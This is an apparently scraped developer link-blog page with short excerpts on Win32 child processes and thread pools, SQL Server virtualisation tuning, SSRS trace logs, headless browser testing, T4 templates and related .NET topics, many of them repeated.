// usage: CreateChildProcess opCreateChildProcess(_T("WpfApplication1.exe"),2048);class CreateChildProcess
{
HANDLE m_hChildProcess;// handle to the child process we create
HANDLE m_hNamedPipe; // handle to the named pipe the paren process creates
HANDLE m_hEvent;
HANDLE m_hThread; // thread in parent process to communicate with child
LPVOID m_pvMappedSection;
DWORD m_cbSharedMem;public: CreateChildProcess(TCHAR* szChildExeFileName,DWORD cbSharedMemSize, int ChildNo )
{
m_cbSharedMem = cbSharedMemSize;
TCHAR szPipeName[1000];
TCHAR szEventName[1000];
swprintf_s(szPipeName, L"Pipe%d_%d", ChildNo, GetCurrentProcessId()); //make the names unique per child and per our (parent) process
swprintf_s(szEventName,L"Event%d_%d", ChildNo, GetCurrentProcessId()); //
SECURITY_ATTRIBUTES SecurityAttributes = {
sizeof( SECURITY_ATTRIBUTES ), // nLength
NULL, // lpSecurityDescriptor. NULL = default for calling process
TRUE // bInheritHandle
};Read more: Calvin Hsia's WebLog
CreateChildProcess opCreateChildProcessVB(_T("NamedPipesVB.exe"),2048, 2);
Paste the CPP code below before the _tWinMain. F5 will show both processes launched. You can alt-tab between the 2: they behave like independent processes. Try terminating one of them.
If you uncomment the MsgBox, then hit F5, you can actually use VS to attach to a child process before it does too much. Try attaching to all 3! See also:<C++ Code>// CreateChildProcess : class in parent process to instantiate and communicate with a child process
// usage: CreateChildProcess opCreateChildProcess(_T("WpfApplication1.exe"),2048);class CreateChildProcess
{
HANDLE m_hChildProcess;// handle to the child process we create
HANDLE m_hNamedPipe; // handle to the named pipe the paren process creates
HANDLE m_hEvent;
HANDLE m_hThread; // thread in parent process to communicate with child
LPVOID m_pvMappedSection;
DWORD m_cbSharedMem;public: CreateChildProcess(TCHAR* szChildExeFileName,DWORD cbSharedMemSize, int ChildNo )
{
m_cbSharedMem = cbSharedMemSize;
TCHAR szPipeName[1000];
TCHAR szEventName[1000];
swprintf_s(szPipeName, L"Pipe%d_%d", ChildNo, GetCurrentProcessId()); //make the names unique per child and per our (parent) process
swprintf_s(szEventName,L"Event%d_%d", ChildNo, GetCurrentProcessId()); //
SECURITY_ATTRIBUTES SecurityAttributes = {
sizeof( SECURITY_ATTRIBUTES ), // nLength
NULL, // lpSecurityDescriptor. NULL = default for calling process
TRUE // bInheritHandle
};Read more: Calvin Hsia's WebLog
General Guidance for SQL Server on Virtualisation
Posted by
jasper22
at
10:58
|
I have been on about four engagements in a row this year where we are looking at SQL performance on VMWare or Hyper-V.Here is a list of common things that you can do with virtualisation that may adversely affect SQL performance. Most of them also apply to physical environments, for example if you are consolidating SQL onto multiple instances. * Using a large Shared disk group for all virtual workloads
* Mounting the VHD to VMWare disk on a server file system (instead of pass though disks)
* Using a large disk pool when only one controller can own the disk group (some SAN’s are limited in this way and some are not)
* Overcommiting CPU
* Overcommiting Memory
* Not using 64k block size and allocation unit size
* Not using Volume alignment (on guest and host)
* Using dynamic disks (much better in Hyper-V R2, but still not generally recommended)
* Not ensuring Logs are on dedicated spindles
* Not using multiple HBA channels on larger workloads
* Sharing a switch between data, network and CSV
* Not using CPU affinity (some virtualisation platforms support affinity)
* Not using an “enlightened” operating system (Hyper-V)
* Running multiple VM’s on a single host slightly decreases throughout, but this is kinda the point of virtualisation so hard to avoid.
* Running lots of SQL Servers on one host and having too few HBA cards or a low queue depth
* Running 32 bit SQL Server guest on workloads that need lot of memory.
* Not pre-sizing TempDB
* not planning for database growth events
The top one item (use of a shared disk group) is a very common configuration for disks, especially when using the clustered shared disk volumes. But we know they will adversely affect performance, so what to do ? ban these configurations? Read more: Bob Duffy's Blobby Blog
* Mounting the VHD to VMWare disk on a server file system (instead of pass though disks)
* Using a large disk pool when only one controller can own the disk group (some SAN’s are limited in this way and some are not)
* Overcommiting CPU
* Overcommiting Memory
* Not using 64k block size and allocation unit size
* Not using Volume alignment (on guest and host)
* Using dynamic disks (much better in Hyper-V R2, but still not generally recommended)
* Not ensuring Logs are on dedicated spindles
* Not using multiple HBA channels on larger workloads
* Sharing a switch between data, network and CSV
* Not using CPU affinity (some virtualisation platforms support affinity)
* Not using an “enlightened” operating system (Hyper-V)
* Running multiple VM’s on a single host slightly decreases throughout, but this is kinda the point of virtualisation so hard to avoid.
* Running lots of SQL Servers on one host and having too few HBA cards or a low queue depth
* Running 32 bit SQL Server guest on workloads that need lot of memory.
* Not pre-sizing TempDB
* not planning for database growth events
The top one item (use of a shared disk group) is a very common configuration for disks, especially when using the clustered shared disk volumes. But we know they will adversely affect performance, so what to do ? ban these configurations? Read more: Bob Duffy's Blobby Blog
BlogEngine.NET Themes
Posted by
jasper22
at
10:57
|
A collection of every single theme pack for BlogEngine.net that can be found.Read more: Codeplex
Win32 Thread Pool
Posted by
jasper22
at
10:56
|
What is a thread pool? Exactly that, a pool of threads. You may have heard of terms like object pooling, thread pooling, car pooling (oops), anyway, the idea behind pooling is that you can re-use the objects which may be threads or database connections or instances of some class. Now why would we ever want to re-use such things? The most important reason would be that creating such an object might take up a lot of resources or time, so, we do the next best thing. We create a bunch of them initially and call the bunch a pool. Whenever someone (some code) wants to use such an object, instead of creating a new one, it gets it from the already existing bunch (pool). BackgroundUsually when I develop something, there is a fairly good reason behind it like my project demanded it or I did it for someone who asked me about it, but this thread pool was a result of neither of these. Actually, around a year back, I had attended an interview with a company where I was asked this question. Well at that time, I didn't really think of it seriously, but a few days back the question came back to me, and this time I decided it was time to get my answer working. Using the CodeMain Files * threadpool.h & threadpool.cpp - defines the CThreadPool class. This class is the main class which provides the thread pooling facilities.
* ThreadPoolAppDlg.cpp - see the OnOK() method. This method makes use of the thread pool. This example was written using VC++ 6.0. The source has now been updated for Visual Studio 2008. The thread pool class itself does not make use of any MFC classes so you should be able to use the thread pool for pure Win32 applications also. Read more: Codeproject
* ThreadPoolAppDlg.cpp - see the OnOK() method. This method makes use of the thread pool. This example was written using VC++ 6.0. The source has now been updated for Visual Studio 2008. The thread pool class itself does not make use of any MFC classes so you should be able to use the thread pool for pure Win32 applications also. Read more: Codeproject
Becoming a Windows Search Ninja - “Mastering Windows Search using Advanced Query Syntax”
Posted by
jasper22
at
10:55
|
Search has become an integral part of Windows, particularly in later versions. While the major search improvements began with Windows Vista and were backported to Windows XP, it's really only with Windows 7 that the larger majority of users are discovering the search bar all over in the operating system. Search is built into every aspect of Windows 7 to help users cope with the increasingly rapidly growing number of files, be they work documents and e-mails, personal photos and videos, or music collections. Many users perform searches without thinking nowadays: it's an ingrained habit of using the operating system. Like many habits, this one is worth breaking in order to to develop an even better one. Here we take a quick look at a few basic search techniques and a few more advanced ones. Force yourself to use them and you'll soon become a master of Windows Search. A bit of extra time now will save you loads of effort in the long run. Read more: Greg's Cool [Insert Clever Name] of the Day
Finding meaningful error details to report execution failures
Posted by
jasper22
at
10:54
|
Today a friend of mine asked for a hand with an SSRS error he was getting. I have to admit, at the time I was pretty busy and feel bad that I didn’t answer the question completely. The error was resolved though and the find/fix by him was impressive to say the least. One thing that was frustrating for both of us was the error presented from the report server when this particular report execution failed. In short, the error was not helpful at all. There is resource to find more in-depth descriptions on the error though by turning to the trace logs that are enabled on reporting services. Below, we will go through searching for these descriptive errors in the logs. On the report server, navigate through the directory structure to the installation folders for the SSRS binary files. In these folder you will find a folder named, LogFiles. This folder will house the default report server trace logs. All execution trace events will be logged in these flat files and can be excellent information to troubleshooting report execution issues. After understanding the trace files, it is also a great way to utilize SSIS to import and report off of them to be more proactive on the report executions. To read in-depth on the trace logs see, "Report Server Service Trace Log"Learning how the log files are recycled can be key on finding the file that will help you in a troubleshooting session. The following extract from the BOL documentation explains just how this process is handled. "The trace log file is ReportServerService_.log. The trace log is an ASCII text file. You can use any text editor to view the file. This file is located at \Microsoft SQL Server\\Reporting Services\LogFiles. The trace log is created daily, starting with the first entry that occurs after midnight (local time), and whenever the service is restarted. The timestamp is based on Coordinated Universal Time (UTC). The file is in EN-US format. By default, trace logs are limited to 32 megabytes and deleted after 14 days" Knowing the recycle times and when a new log is created can lower the length of time spent on searching them for the error needed.Read more: LessThanDot
Using HtmlUnit on .NET for Headless Browser Automatio
Posted by
jasper22
at
10:53
|
If you subscribe to this blog, you may have noticed that I’ve been writing about test automation methods a lot lately. You could even think of it as a series covering different technical approaches: * Hosting your app in a real web server and testing it through a real web browser using WatiN (plus, in this case, SpecFlow for Cucumber-style specifications)
* Hosting your app in a real web server and testing it with client-side automation using Microsoft’s Lightweight Test Automation Framework
* Hosting your app directly in the test suite process and bypassing both the web server and the browser entirely using my MvcIntegrationTestFramework experiment
* Unit testing code in isolation – best and worst practices, and why I think unit testing isn’t applicable to all types of code
* Injecting code across process boundaries to assist integration testing approaches that host your app in a real web server, using Deleporter The reason I keep writing about this is that I still think it’s very much an unsolved problem. We all want to deliver more reliable software, we want better ways to design functionality and verify implementation… but we don’t want to get so caught up in the beaurocracy of test suite maintenance that it consumes all our time and obliterates productivity. Yet another approachRails developers (and to a lesser extent Java web developers) commonly use yet another test automation technique: hosting the app in a real web server, and accessing it through a fast, invisible, simulated web browser rather than a real browser. This is known as headless browser automation. Read more: Steve Sanderson’s blog
* Hosting your app in a real web server and testing it with client-side automation using Microsoft’s Lightweight Test Automation Framework
* Hosting your app directly in the test suite process and bypassing both the web server and the browser entirely using my MvcIntegrationTestFramework experiment
* Unit testing code in isolation – best and worst practices, and why I think unit testing isn’t applicable to all types of code
* Injecting code across process boundaries to assist integration testing approaches that host your app in a real web server, using Deleporter The reason I keep writing about this is that I still think it’s very much an unsolved problem. We all want to deliver more reliable software, we want better ways to design functionality and verify implementation… but we don’t want to get so caught up in the beaurocracy of test suite maintenance that it consumes all our time and obliterates productivity. Yet another approachRails developers (and to a lesser extent Java web developers) commonly use yet another test automation technique: hosting the app in a real web server, and accessing it through a fast, invisible, simulated web browser rather than a real browser. This is known as headless browser automation. Read more: Steve Sanderson’s blog
Free-to-use CryEngine plans emerge
Posted by
jasper22
at
10:50
|
Crytek wants to release a standalone, free platform, that will be ‘up to speed’ with CE3Frankfurt-headquartered Crytek may be about to compete with both Unity and Epic Games on the emerging battleground of free-to-use engines. The global indie outfit told Develop that it wants to release a standalone free engine “that will be up to speed” with the CryEngine 3 platform. Unreal vendor Epic Games and Unity have both seen their user-bases mushroom overnight since launching versions of their own engines that, while tied to different royalty rates, are completely free to download and operate. Now the CryEngine 3 group has revealed it wants to tap into this thriving market.
The firm’s CEO Cevat Yerli told Develop that Crytek already gives away a CryEngine 2 editor to the mod community, but explained that Crytek’s expansion strategy stretches beyond. “We have a very vivid community of users and modders and content creators, and usually that’s a great way of unlocking the engine,” he said. “That being said, it’s not the same as what Epic or Unity are currently doing, but we are now pushing harder on this area. We did it before already, but we haven’t pushed it that far yet.” Read more: Develop
The firm’s CEO Cevat Yerli told Develop that Crytek already gives away a CryEngine 2 editor to the mod community, but explained that Crytek’s expansion strategy stretches beyond. “We have a very vivid community of users and modders and content creators, and usually that’s a great way of unlocking the engine,” he said. “That being said, it’s not the same as what Epic or Unity are currently doing, but we are now pushing harder on this area. We did it before already, but we haven’t pushed it that far yet.” Read more: Develop
Project Packager Add-In for Visual Studio 2010
Posted by
jasper22
at
10:49
|
This Add-In for Visual Studio 2010 will package up your solution (actually, any folder you choose) into a zip file excluding any files with extensions you specify and any folders whose names you specify.I cant upload msi files to this blog, so in order to install you will need to build the project. I packaged up the Add-In solution using the Add-In itself and uploaded it here. 1. Download the solution, open with Visual Studio 2010 and Build All.
2. Right click the setup project and select Install.
3. Close Visual Studio 2010 and restart.
4. In the Tools menu item –> Add-in Manager click the PackagerAddIn check box.To use the Add-In, go to Tools –> PackagerAddIn
MotivationAfter completing a project, either as a demo in class, or for a customer, I often need to zip up a solution send it by email or store it somewhere. But even simple projects with Visual Studio 2010 create many binary files that increase the size of the package and contribute nothing to the recipient. Moreover, the baggage, once delivered is usually never deleted for fear that it is essential to to the solution. Once added to the source code control system it will slow down every check out and build for life. Moreover, it makes the project unnecessarily daunting for less experienced developers to learn. I have tried using "Clean Solution" from the Build menu to remove the baggage, and, yes, it kinda works. But it is not quite as flexible as I need. For instance, though you can configure which file extensions will be deleted, you can't configure it to delete folders even if they are empty after the clean. "Clean Solution" also wont zip up the solution for you when you are done. Rather than delete the files myself, and run the risk of deleting something important, I would like to copy all the important files without the baggage to a separate location, then zip up that folder and then delete the folder. This way, even if I forget an important file in the process, the original still exists and can be added. Read more: David Sackstein's Blog
2. Right click the setup project and select Install.
3. Close Visual Studio 2010 and restart.
4. In the Tools menu item –> Add-in Manager click the PackagerAddIn check box.To use the Add-In, go to Tools –> PackagerAddIn
MotivationAfter completing a project, either as a demo in class, or for a customer, I often need to zip up a solution send it by email or store it somewhere. But even simple projects with Visual Studio 2010 create many binary files that increase the size of the package and contribute nothing to the recipient. Moreover, the baggage, once delivered is usually never deleted for fear that it is essential to to the solution. Once added to the source code control system it will slow down every check out and build for life. Moreover, it makes the project unnecessarily daunting for less experienced developers to learn. I have tried using "Clean Solution" from the Build menu to remove the baggage, and, yes, it kinda works. But it is not quite as flexible as I need. For instance, though you can configure which file extensions will be deleted, you can't configure it to delete folders even if they are empty after the clean. "Clean Solution" also wont zip up the solution for you when you are done. Rather than delete the files myself, and run the risk of deleting something important, I would like to copy all the important files without the baggage to a separate location, then zip up that folder and then delete the folder. This way, even if I forget an important file in the process, the original still exists and can be added. Read more: David Sackstein's Blog
More T4
Posted by
jasper22
at
10:48
|
T4 (Text Template Transformation Toolkit) is a code generator integrated on Visual Studio. Hmmm CodeSmith? ;-)Creating and editing a T4 Template
Steps * Add a Text File
* Rename with a .tt extension
* Write T4 template header configuration and template code
<#@ template language="C#v3.5" #>
<#@ import namespace = "System.Text.RegularExpressions" #>
<#@ output extension=".cs" #> <#
string lTitle = "MyHelloWorldClass";
#>namespace MyProject.Test
{
public class <#=lTitle #>
{
public <#=lTitle #>()
{
}
}
}Actually EF (Entity Framework) uses T4 to customize your EF generated classes.Tools
Tangible Engineering offer a T4 Editor (Free or Pro versions) to integrate on Visual Studio with intellisense. Read more: Refact your C# Code
Steps * Add a Text File
* Rename with a .tt extension
* Write T4 template header configuration and template code
<#@ template language="C#v3.5" #>
<#@ import namespace = "System.Text.RegularExpressions" #>
<#@ output extension=".cs" #> <#
string lTitle = "MyHelloWorldClass";
#>namespace MyProject.Test
{
public class <#=lTitle #>
{
public <#=lTitle #>()
{
}
}
}Actually EF (Entity Framework) uses T4 to customize your EF generated classes.Tools
Tangible Engineering offer a T4 Editor (Free or Pro versions) to integrate on Visual Studio with intellisense. Read more: Refact your C# Code
“Originally Written in…” vs. Code Generation
Posted by
jasper22
at
10:47
|
My assertion that the iPhone license phrase “Applications must be originally written in Objective-C, C, C++, or JavaScript as executed by the iPhone OS WebKit engine” can only mean zero code generation has been questioned. Here’s why I stand by that assessment (and consider the clause beyond the pale). Let me point out that the common-sense reading of that clause is straightforward. The word “originally” clearly implies that writing this:UIView.BeginAnimations("");
UIView.SetAnimationTransition(UIViewAnimationTransition.FlipFromLeft, this.Superview, true);
UIView.SetAnimationCurve(UIViewAnimationCurve.EaseInOut);
UIView.SetAnimationDuration(1.0);and transforming it into:[UIView beginAnimations: nil context:context];
[UIView setAnimationTransition: UIViewAnimationTransitionFlipFromLeft forView: [self superView] cache: YES];
[UIView setAnimationCurve: UIViewAnimationCurveEaseInOut];
[UIView setAnimationDuration: 1.0]is forbidden. To take it to the extreme, can you imagine betting your company on convincing a jury that writing the first (which is C# and MonoTouch) and generating the second means it was “originally written in Objective C”? If so, you have some hard lessons about the legal system to learn. I should point out that even though this code is clearly very similar, there are some slight differences, such as C#’s enumerated values UIViewAnimationTransition.FlipFromLeft as opposed to Objective C’s constant value UIViewAnimationTransitionFlipFromLeft. The . makes a difference in the parse tree and in the programmer’s mind — a small one, but a helpful one. Read more: Knowing .NET
UIView.SetAnimationTransition(UIViewAnimationTransition.FlipFromLeft, this.Superview, true);
UIView.SetAnimationCurve(UIViewAnimationCurve.EaseInOut);
UIView.SetAnimationDuration(1.0);and transforming it into:[UIView beginAnimations: nil context:context];
[UIView setAnimationTransition: UIViewAnimationTransitionFlipFromLeft forView: [self superView] cache: YES];
[UIView setAnimationCurve: UIViewAnimationCurveEaseInOut];
[UIView setAnimationDuration: 1.0]is forbidden. To take it to the extreme, can you imagine betting your company on convincing a jury that writing the first (which is C# and MonoTouch) and generating the second means it was “originally written in Objective C”? If so, you have some hard lessons about the legal system to learn. I should point out that even though this code is clearly very similar, there are some slight differences, such as C#’s enumerated values UIViewAnimationTransition.FlipFromLeft as opposed to Objective C’s constant value UIViewAnimationTransitionFlipFromLeft. The . makes a difference in the parse tree and in the programmer’s mind — a small one, but a helpful one. Read more: Knowing .NET
AWESOMIUM
Posted by
jasper22
at
10:46
|
* A framework for an advanced, 3D web-browser
* Powering a GUI using Web-based content
* The implementation of in-game advertisting.
Read more: Khrona
My Visual Studio Theme for Windows 7
Posted by
jasper22
at
10:43
|
This is a simple Visual Studio theme I put together for Windows 7 on my laptop. Enjoy! Read more: Rob Caron
How I made our websites run 10 times faster
Posted by
jasper22
at
10:42
|
For a very long time our websites have been very sluggish. There are several reasons to this, some obvious, while other not so obvious. Here I will explain to you how we made our websites perform at lightning speed!
How I made our websites run 10 times fasterThe first thing you have to realize when working with a website project, which isn't just merely HTML documents offed at some server somewhere, is that although YSlow is a very good product, the assumption that most of your website speed is in the client-layer just isn't true. YSlow is a *KICK-ASS* product, and start out with YSlow, but once you have gone through the issues you can fix that YSlow shows you, please do not stop there...! If you have any kind of complex server back-end, you will have to move on further and also optimize your server back-end...What we did...First of all I started out with figuring out how to reduce the impact of the ViewState. The ViewState has a very bad reputation, and to be quite frankly, most of its bad reputation is not justified. The ViewState is a really beautiful thing, and if you're going to develop any kind of complex application or website, you will have to use some kind of either similar mechanism to the ViewState, or the ViewState itself. Though when you couple the ViewState with a Modularized Framework like Ra-Brix, the ViewState problems accumulate. Since all our websites are built on Ra-Brix, we had to do something about it. A couple of weeks ago I wrote a pretty detailed blog about how we fixed our ViewState problems in Ra-Brix. To summarize; we saved it on the server... Read more: Ra-Ajax
How I made our websites run 10 times fasterThe first thing you have to realize when working with a website project, which isn't just merely HTML documents offed at some server somewhere, is that although YSlow is a very good product, the assumption that most of your website speed is in the client-layer just isn't true. YSlow is a *KICK-ASS* product, and start out with YSlow, but once you have gone through the issues you can fix that YSlow shows you, please do not stop there...! If you have any kind of complex server back-end, you will have to move on further and also optimize your server back-end...What we did...First of all I started out with figuring out how to reduce the impact of the ViewState. The ViewState has a very bad reputation, and to be quite frankly, most of its bad reputation is not justified. The ViewState is a really beautiful thing, and if you're going to develop any kind of complex application or website, you will have to use some kind of either similar mechanism to the ViewState, or the ViewState itself. Though when you couple the ViewState with a Modularized Framework like Ra-Brix, the ViewState problems accumulate. Since all our websites are built on Ra-Brix, we had to do something about it. A couple of weeks ago I wrote a pretty detailed blog about how we fixed our ViewState problems in Ra-Brix. To summarize; we saved it on the server... Read more: Ra-Ajax
Subscribe to:
Posts (Atom)